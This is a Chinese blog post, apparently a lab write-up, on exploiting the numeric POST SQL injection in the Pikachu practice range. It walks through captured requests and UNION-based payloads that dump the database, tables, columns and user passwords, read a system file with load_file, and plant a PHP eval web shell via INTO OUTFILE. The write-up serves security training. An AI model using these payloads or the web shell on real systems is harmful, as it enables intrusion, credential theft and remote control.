pikachu靶场SQL-Inject模块的实验操作

pikachu靶场SQL-Inject模块的实验操作

实验环境

  • pikachu靶场

  • bp抓包

  • FoxyProxy插件

  • hackbar插件

实验思路

  1. 分析网站以及数据包,找到可能纯在的注入点(可控变量)
  2. 测试可能纯在的注入点(可控变量)是否可以被直接或间接的修改其值,并根据回显信息判断是否能够完整(即网站没有对该变量的值进行过滤或者该过滤能够被绕过)的传到数据库中执行
  3. 进行sql注入,拿到想要的信息

实验步骤

实验一:数字型注入(post)

image-20260707142103663

1.分析数据包

首先分析这是一个post请求,通过浏览器提交查询,bp抓包分析数据包

image-20260707142643638

image-20260707142658030

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i

id=2&submit=%E6%9F%A5%E8%AF%A2

可知我们提交查询的数据是通过id变量提交,同时也通过submit变量提交我们的是否提交的状态,因此id可能纯在注入点。

2.判断是否是注入点

我们将数据包放在bp的Repeater模块中,通过修改数据包中id变量的值来判断网站是否对id的值进行过滤以及该值是否会带到数据库中执行

image-20260707143511921

通过修改数据包中id变量的值并发送后的响应信息可知,该值没有被过滤并带到了数据库执行

image-20260707143558616

#请求数据包

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i

id=2'&submit=%E6%9F%A5%E8%AF%A2
#回显信息
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

说明id是可控变量,并且网站没有过滤,下一步我们要进行sql注入

3.sql注入

1.判断是数字型还是字符型:通过and 1=1和and 1=2判断,响应包正常回显,说明是数字型。

image-20260707151720015

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i

id=2 and 1=1  &submit=%E6%9F%A5%E8%AF%A2

image-20260707165321478

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i

id=2 and 1=2 &submit=%E6%9F%A5%E8%AF%A2

2.查询所有用户的信息:or 1=1

image-20260707153301317

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i

id=2 or 1=1 &submit=%E6%9F%A5%E8%AF%A2

3.order by猜测字段:输入order by 2时还能查询到结果,但输入order by 3时就没有结果了,说明有两个字段。

image-20260707165808015

image-20260707170336299

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i

id=2 order by 2&submit=%E6%9F%A5%E8%AF%A2

4.union查询:因为前面有两个字段,所以查询时只能有两个占位显示符

image-20260707170711659

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.202.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://192.168.202.130
Connection: close
Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
Upgrade-Insecure-Requests: 1
Priority: u=0, i

id=-2 union select 1,2 &submit=%E6%9F%A5%E8%AF%A2

5.爆库、用户、版本号、表、列、字段值:

  • 利用函数 database(),user(),version() 可以得到所探测数据库的数据库名、用户名和版本号
id=-1 union select database(),user()

image-20260707171109051

image-20260707171200786

  • 爆表(group_concat函数让查询的结果在一行显示)
id=-2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'

image-20260707171922577

  • 爆破users表中的字段(列名)
id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'

image-20260707172554424

  • 爆字段值,爆破users表中字段的值
id=-1 union select username,password from users

image-20260707172939752

6.读取系统文件

id=-1 union select 1,load_file('C:\\Windows\\win.ini')

image-20260707182112095
7.写入木马文件

id=1 union select 1,'<?php @eval($_POST["m"]);?>' into outfile 'C:/phpstudy/www/pikachu/vul/sqli/shell.php'

image-20260707182112094

image-20260707182043915

posted @ 2026-07-07 18:24  新手打怪兽  阅读(3)  评论(0)    收藏  举报